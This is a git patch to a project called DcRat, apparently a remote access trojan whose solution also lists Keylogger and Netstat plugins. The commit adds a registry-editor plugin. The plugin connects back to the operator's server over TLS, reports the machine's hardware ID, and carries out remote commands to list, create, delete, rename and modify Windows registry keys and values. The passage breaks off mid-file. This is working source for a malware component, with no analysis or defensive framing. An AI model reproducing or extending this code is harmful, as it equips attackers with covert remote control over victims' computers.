From 5b44718df41f260b91d04304c0e520b0ea80f01b Mon Sep 17 00:00:00 2001 From: qwqdanchun <287182701@qq.com> Date: Fri, 16 Apr 2021 17:22:34 +0800 Subject: [PATCH] 1 --- DcRat.sln | 11 + Plugin/Regedit/Regedit.sln | 25 + Plugin/Regedit/Regedit/Connection.cs | 227 +++++ .../Regedit/Regedit/Handler/ByteConverter.cs | 135 +++ Plugin/Regedit/Regedit/Handler/RegManager.cs | 255 ++++++ .../Regedit/Regedit/Handler/RegistryEditor.cs | 397 +++++++++ .../Regedit/Handler/RegistryKeyExtensions.cs | 399 +++++++++ .../Regedit/Handler/RegistryKeyHelper.cs | 156 ++++ .../Regedit/Regedit/Handler/RegistrySeeker.cs | 183 ++++ Plugin/Regedit/Regedit/ILMerge.props | 67 ++ Plugin/Regedit/Regedit/ILMergeOrder.txt | 4 + Plugin/Regedit/Regedit/Packet.cs | 50 ++ Plugin/Regedit/Regedit/Plugin.cs | 44 + .../Regedit/Properties/AssemblyInfo.cs | 37 + Plugin/Regedit/Regedit/Regedit.csproj | 83 ++ Plugin/Regedit/Regedit/Zip.cs | 45 + Plugin/Regedit/Regedit/packages.config | 5 + Server/Forms/Form1.cs | 12 +- Server/Forms/FormRegValueEditBinary.cs | 1 + Server/Forms/FormRegValueEditMultiString.cs | 1 + Server/Forms/FormRegValueEditString.cs | 1 + Server/Forms/FormRegValueEditWord.cs | 1 + Server/Forms/FormRegistryEditor.Designer.cs | 840 +++++++++--------- Server/Forms/FormRegistryEditor.cs | 24 +- Server/Forms/FormRegistryEditor.resx | 7 +- ...rFileSearcher.cs => HandleFileSearcher.cs} | 2 +- Server/Handle Packet/HandleRegManager.cs | 63 ++ Server/Handle Packet/Packet.cs | 8 +- Server/Helper/Controls/Regedit.cs | 12 +- .../Helper/Controls/RegistryValueLstItem.cs | 1 + Server/Helper/Methods.cs | 185 +++- .../{Controls => }/RegistryKeyExtensions.cs | 33 +- Server/Helper/RegistryKeyHelper.cs | 156 ++++ Server/Server.csproj | 6 +- 34 files changed, 3021 insertions(+), 455 deletions(-) create mode 100644 Plugin/Regedit/Regedit.sln create mode 100644 Plugin/Regedit/Regedit/Connection.cs create mode 100644 Plugin/Regedit/Regedit/Handler/ByteConverter.cs create mode 100644 Plugin/Regedit/Regedit/Handler/RegManager.cs create mode 100644 Plugin/Regedit/Regedit/Handler/RegistryEditor.cs create mode 100644 Plugin/Regedit/Regedit/Handler/RegistryKeyExtensions.cs create mode 100644 Plugin/Regedit/Regedit/Handler/RegistryKeyHelper.cs create mode 100644 Plugin/Regedit/Regedit/Handler/RegistrySeeker.cs create mode 100644 Plugin/Regedit/Regedit/ILMerge.props create mode 100644 Plugin/Regedit/Regedit/ILMergeOrder.txt create mode 100644 Plugin/Regedit/Regedit/Packet.cs create mode 100644 Plugin/Regedit/Regedit/Plugin.cs create mode 100644 Plugin/Regedit/Regedit/Properties/AssemblyInfo.cs create mode 100644 Plugin/Regedit/Regedit/Regedit.csproj create mode 100644 Plugin/Regedit/Regedit/Zip.cs create mode 100644 Plugin/Regedit/Regedit/packages.config rename Server/Handle Packet/{HandlerFileSearcher.cs => HandleFileSearcher.cs} (97%) create mode 100644 Server/Handle Packet/HandleRegManager.cs rename Server/Helper/{Controls => }/RegistryKeyExtensions.cs (74%) create mode 100644 Server/Helper/RegistryKeyHelper.cs diff --git a/DcRat.sln b/DcRat.sln index dae232f..970a4fe 100644 --- a/DcRat.sln +++ b/DcRat.sln @@ -49,6 +49,8 @@ Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Keylogger", "Plugin\Keylogg EndProject Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Netstat", "Plugin\Netstat\Netstat\Netstat.csproj", "{EFFE3048-E904-48FD-B8C0-290E8E9290FB}" EndProject +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Regedit", "Plugin\Regedit\Regedit\Regedit.csproj", "{AB6CDF36-F336-4F14-8D69-3C190B7DEC65}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Any CPU = Debug|Any CPU @@ -233,6 +235,14 @@ Global {EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Release|Any CPU.Build.0 = Release|Any CPU {EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Release|x86.ActiveCfg = Release|Any CPU {EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Release|x86.Build.0 = Release|Any CPU + {AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Debug|Any CPU.Build.0 = Debug|Any CPU + {AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Debug|x86.ActiveCfg = Debug|Any CPU + {AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Debug|x86.Build.0 = Debug|Any CPU + {AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Release|Any CPU.ActiveCfg = Release|Any CPU + {AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Release|Any CPU.Build.0 = Release|Any CPU + {AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Release|x86.ActiveCfg = Release|Any CPU + {AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Release|x86.Build.0 = Release|Any CPU EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE @@ -257,6 +267,7 @@ Global {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6} = {0DE8DA5D-061D-4649-8A56-48729CF1F789} {5D01A326-0357-4C3F-A196-3B8B866C9613} = {0DE8DA5D-061D-4649-8A56-48729CF1F789} {EFFE3048-E904-48FD-B8C0-290E8E9290FB} = {0DE8DA5D-061D-4649-8A56-48729CF1F789} + {AB6CDF36-F336-4F14-8D69-3C190B7DEC65} = {0DE8DA5D-061D-4649-8A56-48729CF1F789} EndGlobalSection GlobalSection(ExtensibilityGlobals) = postSolution SolutionGuid = {1C926148-C492-48B3-8F82-7EBB235A9866} diff --git a/Plugin/Regedit/Regedit.sln b/Plugin/Regedit/Regedit.sln new file mode 100644 index 0000000..15f717e --- /dev/null +++ b/Plugin/Regedit/Regedit.sln @@ -0,0 +1,25 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.29123.88 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Regedit", "Regedit\Regedit.csproj", "{1092ea5e-0249-4a81-a957-5bc44182128c}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {1092ea5e-0249-4a81-a957-5bc44182128c}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {1092ea5e-0249-4a81-a957-5bc44182128c}.Debug|Any CPU.Build.0 = Debug|Any CPU + {1092ea5e-0249-4a81-a957-5bc44182128c}.Release|Any CPU.ActiveCfg = Release|Any CPU + {1092ea5e-0249-4a81-a957-5bc44182128c}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {4FD410CC-1F1D-4948-A108-13285D633CDD} + EndGlobalSection +EndGlobal diff --git a/Plugin/Regedit/Regedit/Connection.cs b/Plugin/Regedit/Regedit/Connection.cs new file mode 100644 index 0000000..1fd750c --- /dev/null +++ b/Plugin/Regedit/Regedit/Connection.cs @@ -0,0 +1,227 @@ +using Plugin.Handler; +using MessagePackLib.MessagePack; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Linq; +using System.Net.Security; +using System.Net.Sockets; +using System.Security.Authentication; +using System.Security.Cryptography.X509Certificates; +using System.Text; +using System.Threading; + +namespace Plugin +{ + public static class Connection + { + public static Socket TcpClient { get; set; } + public static SslStream SslClient { get; set; } + public static X509Certificate2 ServerCertificate { get; set; } + private static byte[] Buffer { get; set; } + private static long HeaderSize { get; set; } + private static long Offset { get; set; } + private static Timer Tick { get; set; } + public static bool IsConnected { get; set; } + private static object SendSync { get; } = new object(); + public static string Hwid { get; set; } + + public static void InitializeClient(byte[] packet) + { + try + { + + TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp) + { + ReceiveBufferSize = 50 * 1024, + SendBufferSize = 50 * 1024, + }; + + TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1])); + if (TcpClient.Connected) + { + Debug.WriteLine("Plugin Connected!"); + IsConnected = true; + SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate); + SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false); + HeaderSize = 4; + Buffer = new byte[HeaderSize]; + Offset = 0; + Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000)); + SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); + + new Thread(() => + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Pac_ket").AsString = "regManager"; + msgpack.ForcePathObject("Hwid").AsString = Hwid; + msgpack.ForcePathObject("Command").AsString = "setClient"; + Send(msgpack.Encode2Bytes()); + new RegManager(new MsgPack()).LoadKey(msgpack.ForcePathObject("RootKeyName").AsString); + }).Start(); + + } + else + { + IsConnected = false; + return; + } + } + catch + { + Debug.WriteLine("Disconnected!"); + IsConnected = false; + return; + } + } + + private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) + { +#if DEBUG + return true; +#endif + return ServerCertificate.Equals(certificate); + } + + public static void Disconnected() + { + + try + { + IsConnected = false; + Tick?.Dispose(); + SslClient?.Dispose(); + TcpClient?.Dispose(); + GC.Collect(); + } + catch { } + } + + public static void ReadServertData(IAsyncResult ar) //Socket read/recevie + { + try + { + if (!TcpClient.Connected || !IsConnected) + { + IsConnected = false; + return; + } + int recevied = SslClient.EndRead(ar); + if (recevied > 0) + { + Offset += recevied; + HeaderSize -= recevied; + if (HeaderSize == 0) + { + HeaderSize = BitConverter.ToInt32(Buffer, 0); + Debug.WriteLine("/// Plugin Buffersize " + HeaderSize.ToString() + " Bytes ///"); + if (HeaderSize > 0) + { + Offset = 0; + Buffer = new byte[HeaderSize]; + while (HeaderSize > 0) + { + int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize); + if (rc <= 0) + { + IsConnected = false; + return; + } + Offset += rc; + HeaderSize -= rc; + if (HeaderSize < 0) + { + IsConnected = false; + return; + } + } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(Buffer); + Offset = 0; + HeaderSize = 4; + Buffer = new byte[HeaderSize]; + } + else + { + HeaderSize = 4; + Buffer = new byte[HeaderSize]; + Offset = 0; + } + } + else if (HeaderSize < 0) + { + IsConnected = false; + return; + } + SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null); + } + else + { + IsConnected = false; + return; + } + } + catch + { + IsConnected = false; + return; + } + } + + public static void Send(byte[] msg) + { + lock (SendSync) + { + try + { + if (!IsConnected || msg == null) + { + return; + } + + byte[] buffersize = BitConverter.GetBytes(msg.Length); + TcpClient.Poll(-1, SelectMode.SelectWrite); + SslClient.Write(buffersize, 0, buffersize.Length); + + if (msg.Length > 1000000) //1mb + { + Debug.WriteLine("send chunks"); + using (MemoryStream memoryStream = new MemoryStream(msg)) + { + int read = 0; + memoryStream.Position = 0; + byte[] chunk = new byte[50 * 1000]; + while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0) + { + TcpClient.Poll(-1, SelectMode.SelectWrite); + SslClient.Write(chunk, 0, read); + } + } + } + else + { + TcpClient.Poll(-1, SelectMode.SelectWrite); + SslClient.Write(msg, 0, msg.Length); + SslClient.Flush(); + } + Debug.WriteLine("Plugin Packet Sent"); + } + catch + { + IsConnected = false; + return; + } + } + } + + public static void CheckServer(object obj) + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Pac_ket").AsString = "Ping!)"; + Send(msgpack.Encode2Bytes()); + GC.Collect(); + } + + } +} diff --git a/Plugin/Regedit/Regedit/Handler/ByteConverter.cs b/Plugin/Regedit/Regedit/Handler/ByteConverter.cs new file mode 100644 index 0000000..fabeeab --- /dev/null +++ b/Plugin/Regedit/Regedit/Handler/ByteConverter.cs @@ -0,0 +1,135 @@ +using System; +using System.Collections.Generic; +using System.Text; + +namespace Plugin.Handler +{ + public class ByteConverter + { + private static byte NULL_BYTE = byte.MinValue; + + public static byte[] GetBytes(int value) + { + return BitConverter.GetBytes(value); + } + + public static byte[] GetBytes(long value) + { + return BitConverter.GetBytes(value); + } + + public static byte[] GetBytes(uint value) + { + return BitConverter.GetBytes(value); + } + + public static byte[] GetBytes(ulong value) + { + return BitConverter.GetBytes(value); + } + + public static byte[] GetBytes(string value) + { + return StringToBytes(value); + } + + public static byte[] GetBytes(string[] value) + { + return StringArrayToBytes(value); + } + + public static int ToInt32(byte[] bytes) + { + return BitConverter.ToInt32(bytes, 0); + } + + public static long ToInt64(byte[] bytes) + { + return BitConverter.ToInt64(bytes, 0); + } + + public static uint ToUInt32(byte[] bytes) + { + return BitConverter.ToUInt32(bytes, 0); + } + + public static ulong ToUInt64(byte[] bytes) + { + return BitConverter.ToUInt64(bytes, 0); + } + + public static string ToString(byte[] bytes) + { + return BytesToString(bytes); + } + + public static string[] ToStringArray(byte[] bytes) + { + return BytesToStringArray(bytes); + } + + private static byte[] GetNullBytes() + { + //Null bytes: 00 00 + return new byte[] { NULL_BYTE, NULL_BYTE }; + } + + private static byte[] StringToBytes(string value) + { + byte[] bytes = new byte[value.Length * sizeof(char)]; + Buffer.BlockCopy(value.ToCharArray(), 0, bytes, 0, bytes.Length); + return bytes; + } + + private static byte[] StringArrayToBytes(string[] strings) + { + List bytes = new List(); + + foreach(string str in strings) + { + bytes.AddRange(StringToBytes(str)); + bytes.AddRange(GetNullBytes()); + } + + return bytes.ToArray(); + } + + private static string BytesToString(byte[] bytes) + { + int nrChars = (int)Math.Ceiling((float)bytes.Length / (float)sizeof(char)); + char[] chars = new char[nrChars]; + Buffer.BlockCopy(bytes, 0, chars, 0, bytes.Length); + return new string(chars); + } + + private static string[] BytesToStringArray(byte[] bytes) + { + List strings = new List(); + + int i = 0; + StringBuilder strBuilder = new StringBuilder(bytes.Length); + while (i < bytes.Length) + { + //Holds the number of nulls (3 nulls indicated end of a string) + int nullcount = 0; + while (i < bytes.Length && nullcount < 3) + { + if (bytes[i] == NULL_BYTE) + { + nullcount++; + } + else + { + strBuilder.Append(Convert.ToChar(bytes[i])); + nullcount = 0; + } + i++; + } + strings.Add(strBuilder.ToString()); + strBuilder.Clear(); + } + + return strings.ToArray(); + } + } +} diff --git a/Plugin/Regedit/Regedit/Handler/RegManager.cs b/Plugin/Regedit/Regedit/Handler/RegManager.cs new file mode 100644 index 0000000..8d858ab --- /dev/null +++ b/Plugin/Regedit/Regedit/Handler/RegManager.cs @@ -0,0 +1,255 @@ +using System; +using System.Drawing; +using System.Drawing.Imaging; +using System.IO; +using System.Text; +using System.Diagnostics; +using System.Threading; +using MessagePackLib.MessagePack; +using System.Runtime.InteropServices; +using Microsoft.Win32; +using System.Text.RegularExpressions; +using System.Runtime.Serialization.Formatters.Binary; +using static Plugin.Handler.RegistrySeeker; + +namespace Plugin.Handler +{ + public class RegManager + { + public RegManager(MsgPack unpack_msgpack) + { + try + { + switch (unpack_msgpack.ForcePathObject("Command").AsString) + { + case "LoadRegistryKey": + { + string RootKeyName = unpack_msgpack.ForcePathObject("RootKeyName").AsString; + LoadKey(RootKeyName); + break; + } + case "CreateRegistryKey": + { + string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString; + CreateKey(ParentPath); + break; + } + case "DeleteRegistryKey": + { + string KeyName = unpack_msgpack.ForcePathObject("KeyName").AsString; + string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString; + DeleteKey(KeyName, ParentPath); + break; + } + case "RenameRegistryKey": + { + string OldKeyName = unpack_msgpack.ForcePathObject("OldKeyName").AsString; + string NewKeyName = unpack_msgpack.ForcePathObject("NewKeyName").AsString; + string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString; + RenameKey(OldKeyName, NewKeyName, ParentPath); + break; + } + case "CreateRegistryValue": + { + string KeyPath = unpack_msgpack.ForcePathObject("KeyPath").AsString; + string Kindstring = unpack_msgpack.ForcePathObject("Kindstring").AsString; + CreateValue(KeyPath, Kindstring); + break; + } + case "DeleteRegistryValue": + { + string KeyPath = unpack_msgpack.ForcePathObject("KeyPath").AsString; + string ValueName = unpack_msgpack.ForcePathObject("ValueName").AsString; + DeleteValue(KeyPath, ValueName); + break; + } + case "RenameRegistryValue": + { + string OldValueName = unpack_msgpack.ForcePathObject("OldValueName").AsString; + string NewValueName = unpack_msgpack.ForcePathObject("NewValueName").AsString; + string KeyPath = unpack_msgpack.ForcePathObject("KeyPath").AsString; + RenameValue(OldValueName, NewValueName, KeyPath); + break; + } + case "ChangeRegistryValue": + { + byte[] Valuebyte = unpack_msgpack.ForcePathObject("Value").GetAsBytes(); + BinaryFormatter formatter = new BinaryFormatter(); + MemoryStream mStream = new MemoryStream(); + mStream.Write(Valuebyte, 0, Valuebyte.Length); + mStream.Flush(); + mStream.Seek(0, SeekOrigin.Begin); + RegValueData Value = (RegValueData)formatter.Deserialize(mStream); + ChangeValue(Value, unpack_msgpack.ForcePathObject("KeyPath").AsString); + break; + } + } + + } + catch (Exception ex) + { + Debug.WriteLine(ex.Message); + Packet.Error(ex.Message); + } + } + + + public void LoadKey(string RootKeyName) + { + try + { + RegistrySeeker seeker = new RegistrySeeker(); + seeker.BeginSeeking(RootKeyName); + + BinaryFormatter formatter = new BinaryFormatter(); + MemoryStream mStream = new MemoryStream(); + formatter.Serialize(mStream, seeker.Matches); + mStream.Flush(); + + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Pac_ket").AsString = "regManager"; + msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid; + msgpack.ForcePathObject("Command").AsString = "LoadKey"; + msgpack.ForcePathObject("RootKey").AsString = RootKeyName; + msgpack.ForcePathObject("Matches").SetAsBytes(mStream.GetBuffer()); + Connection.Send(msgpack.Encode2Bytes()); + } + catch (Exception ex) + { + Packet.Error(ex.Message); + } + } + public void CreateKey(string ParentPath) + { + string errorMsg; + string newKeyName = ""; + + try + { + RegistryEditor.CreateRegistryKey(ParentPath, out newKeyName, out errorMsg); + } + catch (Exception ex) + { + Packet.Error(ex.Message); + } + } + public void DeleteKey(string KeyName, string ParentPath) + { + string errorMsg; + try + { + RegistryEditor.DeleteRegistryKey(KeyName, ParentPath, out errorMsg); + } + catch (Exception ex) + { + Packet.Error(ex.Message); + } + } + public void RenameKey(string OldKeyName, string NewKeyName, string ParentPath) + { + string errorMsg; + try + { + RegistryEditor.RenameRegistryKey(OldKeyName, NewKeyName, ParentPath, out errorMsg); + } + catch (Exception ex) + { + Packet.Error(ex.Message); + } + } + public void CreateValue(string KeyPath, string Kindstring) + { + string errorMsg; + string newKeyName = ""; + RegistryValueKind Kind = RegistryValueKind.None; + switch (Kindstring) + { + case "-1": + { + Kind = RegistryValueKind.None; + break; + } + case "0": + { + Kind = RegistryValueKind.Unknown; + break; + } + case "1": + { + Kind = RegistryValueKind.String; + break; + } + case "2": + { + Kind = RegistryValueKind.ExpandString; + break; + } + case "3": + { + Kind = RegistryValueKind.Binary; + break; + } + case "4": + { + Kind = RegistryValueKind.DWord; + break; + } + case "7": + { + Kind = RegistryValueKind.MultiString; + break; + } + case "11": + { + Kind = RegistryValueKind.QWord; + break; + } + } + try + { + RegistryEditor.CreateRegistryValue(KeyPath, Kind, out newKeyName, out errorMsg); + } + catch (Exception ex) + { + Packet.Error(ex.Message); + } + } + public void DeleteValue(string KeyPath,string ValueName) + { + string errorMsg; + try + { + RegistryEditor.DeleteRegistryValue(KeyPath, ValueName, out errorMsg); + } + catch (Exception ex) + { + Packet.Error(ex.Message); + } + } + public void RenameValue(string OldValueName, string NewValueName, string KeyPath) + { + string errorMsg; + try + { + RegistryEditor.RenameRegistryValue(OldValueName, NewValueName, KeyPath, out errorMsg); + } + catch (Exception ex) + { + Packet.Error(ex.Message); + } + } + public void ChangeValue(RegValueData Value, string KeyPath) + { + string errorMsg; + try + { + RegistryEditor.ChangeRegistryValue(Value, KeyPath, out errorMsg); + } + catch (Exception ex) + { + Packet.Error(ex.Message); + } + } + } +} + diff --git a/Plugin/Regedit/Regedit/Handler/RegistryEditor.cs b/Plugin/Regedit/Regedit/Handler/RegistryEditor.cs new file mode 100644 index 0000000..55c273a --- /dev/null +++ b/Plugin/Regedit/Regedit/Handler/RegistryEditor.cs @@ -0,0 +1,397 @@ +using Microsoft.Win32; +using System; +using static Plugin.Handler.RegistrySeeker; + +namespace Plugin.Handler +{ + public class RegistryEditor + { + private const string REGISTRY_KEY_CREATE_ERROR = "Cannot create key: Error writing to the registry"; + + private const string REGISTRY_KEY_DELETE_ERROR = "Cannot delete key: Error writing to the registry"; + + private const string REGISTRY_KEY_RENAME_ERROR = "Cannot rename key: Error writing to the registry"; + + private const string REGISTRY_VALUE_CREATE_ERROR = "Cannot create value: Error writing to the registry"; + + private const string REGISTRY_VALUE_DELETE_ERROR = "Cannot delete value: Error writing to the registry"; + + private const string REGISTRY_VALUE_RENAME_ERROR = "Cannot rename value: Error writing to the registry"; + + private const string REGISTRY_VALUE_CHANGE_ERROR = "Cannot change value: Error writing to the registry"; + + /// + /// Attempts to create the desired sub key to the specified parent. + /// + /// The path to the parent for which to create the sub-key on. + /// output parameter that holds the name of the sub-key that was create. + /// output parameter that contains possible error message. + /// Returns true if action succeeded. + public static bool CreateRegistryKey(string parentPath, out string name, out string errorMsg) + { + name = ""; + try + { + RegistryKey parent = GetWritableRegistryKey(parentPath); + + + //Invalid can not open parent + if (parent == null) + { + errorMsg = "You do not have write access to registry: " + parentPath + ", try running client as administrator"; + return false; + } + + //Try to find available names + int i = 1; + string testName = String.Format("New Key #{0}", i); + + while (parent.ContainsSubKey(testName)) + { + i++; + testName = String.Format("New Key #{0}", i); + } + name = testName; + + using (RegistryKey child = parent.CreateSubKeySafe(name)) + { + //Child could not be created + if (child == null) + { + errorMsg = REGISTRY_KEY_CREATE_ERROR; + return false; + } + } + + //Child was successfully created + errorMsg = ""; + return true; + } + catch (Exception ex) + { + errorMsg = ex.Message; + return false; + } + + } + + /// + /// Attempts to delete the desired sub-key from the specified parent. + /// + /// The name of the sub-key to delete. + /// The path to the parent for which to delete the sub-key on. + /// output parameter that contains possible error message. + /// Returns true if the operation succeeded. + public static bool DeleteRegistryKey(string name, string parentPath, out string errorMsg) + { + try + { + RegistryKey parent = GetWritableRegistryKey(parentPath); + + //Invalid can not open parent + if (parent == null) + { + errorMsg = "You do not have write access to registry: " + parentPath + ", try running client as administrator"; + return false; + } + + //Child does not exist + if (!parent.ContainsSubKey(name)) + { + errorMsg = "The registry: " + name + " does not exist in: " + parentPath; + //If child does not exists then the action has already succeeded + return true; + } + + bool success = parent.DeleteSubKeyTreeSafe(name); + + //Child could not be deleted + if (!success) + { + errorMsg = REGISTRY_KEY_DELETE_ERROR; + return false; + } + + //Child was successfully deleted + errorMsg = ""; + return true; + } + catch (Exception ex) + { + errorMsg = ex.Message; + return false; + } + } + + /// + /// Attempts to rename the desired key. + /// + /// The name of the key to rename. + /// The name to use for renaming. + /// The path of the parent for which to rename the key. + /// output parameter that contains possible error message. + /// Returns true if the operation succeeded. + public static bool RenameRegistryKey(string oldName, string newName, string parentPath, out string errorMsg) + { + try + { + + RegistryKey parent = GetWritableRegistryKey(parentPath); + + //Invalid can not open parent + if (parent == null) + { + errorMsg = "You do not have write access to registry: " + parentPath + ", try running client as administrator"; + return false; + } + + //Child does not exist + if (!parent.ContainsSubKey(oldName)) + { + errorMsg = "The registry: " + oldName + " does not exist in: " + parentPath; + return false; + } + + bool success = parent.RenameSubKeySafe(oldName, newName); + + //Child could not be renamed + if (!success) + { + errorMsg = REGISTRY_KEY_RENAME_ERROR; + return false; + } + + //Child was successfully renamed + errorMsg = ""; + return true; + + } + catch (Exception ex) + { + errorMsg = ex.Message; + return false; + } + } + + /// + /// Attempts to create the desired value for the specified parent. + /// + /// The path to the key for which to create the registry value on. + /// The type of the registry value to create. + /// output parameter that holds the name of the registry value that was create. + /// output parameter that contains possible error message. + /// Returns true if the operation succeeded. + public static bool CreateRegistryValue(string keyPath, RegistryValueKind kind, out string name, out string errorMsg) + { + name = ""; + try + { + RegistryKey key = GetWritableRegistryKey(keyPath); + + //Invalid can not open key + if (key == null) + { + errorMsg = "You do not have write access to registry: " + keyPath + ", try running client as administrator"; + return false; + } + + //Try to find available names + int i = 1; + string testName = String.Format("New Value #{0}", i); + + while (key.ContainsValue(testName)) + { + i++; + testName = String.Format("New Value #{0}", i); + } + name = testName; + + bool success = key.SetValueSafe(name, kind.GetDefault(), kind); + + //Value could not be created + if (!success) + { + errorMsg = REGISTRY_VALUE_CREATE_ERROR; + return false; + } + + //Value was successfully created + errorMsg = ""; + return true; + } + catch (Exception ex) + { + errorMsg = ex.Message; + return false; + } + + } + + /// + /// Attempts to delete the desired registry value from the specified key. + /// + /// The path to the key for which to delete the registry value on. + /// /// The name of the registry value to delete. + /// output parameter that contains possible error message. + /// Returns true if the operation succeeded. + public static bool DeleteRegistryValue(string keyPath, string name, out string errorMsg) + { + try + { + RegistryKey key = GetWritableRegistryKey(keyPath); + + //Invalid can not open key + if (key == null) + { + errorMsg = "You do not have write access to registry: " + keyPath + ", try running client as administrator"; + return false; + } + + //Value does not exist + if (!key.ContainsValue(name)) + { + errorMsg = "The value: " + name + " does not exist in: " + keyPath; + //If value does not exists then the action has already succeeded + return true; + } + + bool success = key.DeleteValueSafe(name); + + //Value could not be deleted + if (!success) + { + errorMsg = REGISTRY_VALUE_DELETE_ERROR; + return false; + } + + //Value was successfully deleted + errorMsg = ""; + return true; + } + catch (Exception ex) + { + errorMsg = ex.Message; + return false; + } + } + + /// + /// Attempts to rename the desired registry value. + /// + /// The name of the registry value to rename. + /// The name to use for renaming. + /// The path of the key for which to rename the registry value. + /// output parameter that contains possible error message. + /// Returns true if the operation succeeded. + public static bool RenameRegistryValue(string oldName, string newName, string keyPath, out string errorMsg) + { + try + { + RegistryKey key = GetWritableRegistryKey(keyPath); + + //Invalid can not open key + if (key == null) + { + errorMsg = "You do not have write access to registry: " + keyPath + ", try running client as administrator"; + return false; + } + + //Value does not exist + if (!key.ContainsValue(oldName)) + { + errorMsg = "The value: " + oldName + " does not exist in: " + keyPath; + return false; + } + + bool success = key.RenameValueSafe(oldName, newName); + + //Value could not be renamed + if (!success) + { + errorMsg = REGISTRY_VALUE_RENAME_ERROR; + return false; + } + + //Value was successfully renamed + errorMsg = ""; + return true; + + } + catch (Exception ex) + { + errorMsg = ex.Message; + return false; + } + } + + /// + /// Attempts to change the value for the desired registry value for the + /// specified key. + /// + /// The registry value to change to in the form of a + /// RegValueData object. + /// The path to the key for which to change the + /// value of the registry value on. + /// output parameter that contains possible error message. + /// Returns true if the operation succeeded. + public static bool ChangeRegistryValue(RegValueData value, string keyPath, out string errorMsg) + { + try + { + RegistryKey key = GetWritableRegistryKey(keyPath); + + //Invalid can not open key + if (key == null) + { + errorMsg = "You do not have write access to registry: " + keyPath + ", try running client as administrator"; + return false; + } + + //Is not default value and does not exist + if (!RegistryKeyHelper.IsDefaultValue(value.Name) && !key.ContainsValue(value.Name)) + { + errorMsg = "The value: " + value.Name + " does not exist in: " + keyPath; + return false; + } + + bool success = key.SetValueSafe(value.Name, value.Data, value.Kind); + + //Value could not be created + if (!success) + { + errorMsg = REGISTRY_VALUE_CHANGE_ERROR; + return false; + } + + //Value was successfully created + errorMsg = ""; + return true; + } + catch (Exception ex) + { + errorMsg = ex.Message; + return false; + } + + } + + public static RegistryKey GetWritableRegistryKey(string keyPath) + { + RegistryKey key = RegistrySeeker.GetRootKey(keyPath); + + if (key != null) + { + //Check if this is a root key or not + if (key.Name != keyPath) + { + //Must get the subKey name by removing root and '\\' + string subKeyName = keyPath.Substring(key.Name.Length + 1); + + key = key.OpenWritableSubKeySafe(subKeyName); + } + } + + return key; + } + } +} diff --git a/Plugin/Regedit/Regedit/Handler/RegistryKeyExtensions.cs b/Plugin/Regedit/Regedit/Handler/RegistryKeyExtensions.cs new file mode 100644 index 0000000..a8c9ec7 --- /dev/null +++ b/Plugin/Regedit/Regedit/Handler/RegistryKeyExtensions.cs @@ -0,0 +1,399 @@ +using Microsoft.Win32; +using System; +using System.Collections.Generic; +using System.Linq; + +namespace Plugin.Handler +{ + /// + /// Provides extensions for registry key and value operations. + /// + public static class RegistryKeyExtensions + { + /// + /// Determines if the registry key by the name provided is null or has the value of null. + /// + /// The name associated with the registry key. + /// The actual registry key. + /// True if the provided name is null or empty, or the key is null; False if otherwise. + private static bool IsNameOrValueNull(this string keyName, RegistryKey key) + { + return (string.IsNullOrEmpty(keyName) || (key == null)); + } + + /// + /// Attempts to get the string value of the key using the specified key name. This method assumes + /// correct input. + /// + /// The key of which we obtain the value of. + /// The name of the key. + /// The default value if value can not be determined. + /// Returns the value of the key using the specified key name. If unable to do so, + /// defaultValue will be returned instead. + public 